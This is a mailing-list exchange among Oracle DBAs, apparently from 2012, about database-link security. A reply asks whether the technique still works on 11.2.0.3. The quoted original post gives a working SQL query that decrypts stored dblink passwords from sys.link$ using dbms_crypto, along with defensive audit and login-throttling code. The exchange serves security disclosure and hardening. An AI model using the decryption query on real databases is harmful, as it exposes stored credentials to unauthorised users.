RE: Database Link Security et al
Date: Wed, 28 Nov 2012 21:29:34 +0100
Message-ID: <4814386347E41145AAE79139EAA398982F74C2D5E9_at_ws03-exch07.iconos.be>
Hi,
Where you able to reproduce this on 11.2.0.3? I checked on two databases and eacht time the dmbs_crypto .decrypt function would give me an error. On 11.2.0.2 it did work however.
Regards,
Freek D'Hooge
Uptime
Oracle Database Administrator
email: freek.dhooge_at_uptime.be
tel +32(0)3 451 23 82
http://www.uptime.be
disclaimer: www.uptime.be/disclaimer
-----Original Message-----
From: oracle-l-bounce_at_freelists.org [mailto:oracle-l-bounce_at_freelists.org] On Behalf Of oracle_at_ukcert.org.uk
Sent: zondag 25 november 2012 21:19
To: oracle-l_at_freelists.org
Subject: Database Link Security et al
So, users can decrypt dblink passwords as the key is included in the ciphertext... -->
SQL> select name, userid,
utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)),
4353, (substr(passwordx,3,16)))) from sys.link$ where name='TEST_LINK';
NAME
USERID
PASSWORD
TEST_LINK
DBLINK_ACCOUNT
MYPW ..one saving grace is that we can now identify incoming db links using this..
select userid, terminal, comment$text from sys.aud$ where comment$text like 'DBLINK%';
USERID NTIMESTAMP# USERHOST COMMENT$TEXT ------------ ----------------- ------- -------------- DBLINK_ACCOUNT 19-NOV-12 01.42.16.305194000 orlin DBLINK_INFO:(SOURCE_GLOBAL_NAME=orcl.4294967295)
-->could be too late though so best to take a few precautions in
advance... preferably automated...
..Same with lack of profiles on SYS account. Sometimes easier to fix ourselves..
create or replace trigger sys_throttler.tra_servererror_ora1017
after servererror on database
declare
l_db_usr varchar2 (32);
begin
if (ora_is_servererror(1017)) then l_db_usr := upper (trim (sys_context ('userenv', 'authenticated_identity'))); if l_db_usr ='SYS' then dbms_lock.sleep (1); else NULL; end if;
end if;
end tra_servererror_ora1017;
/
More like this at UKOUG Monday, if you are in the area...
Cheers,
Paul M. Wright
http://www.oraclesecurity.com
http://2012.ukoug.org/default.asp?p=9339&dlgact=shwprs&prs_prsid=7736&day_dayid=62
-- http://www.freelists.org/webpage/oracle-l -- http://www.freelists.org/webpage/oracle-lReceived on Wed Nov 28 2012 - 21:29:34 CET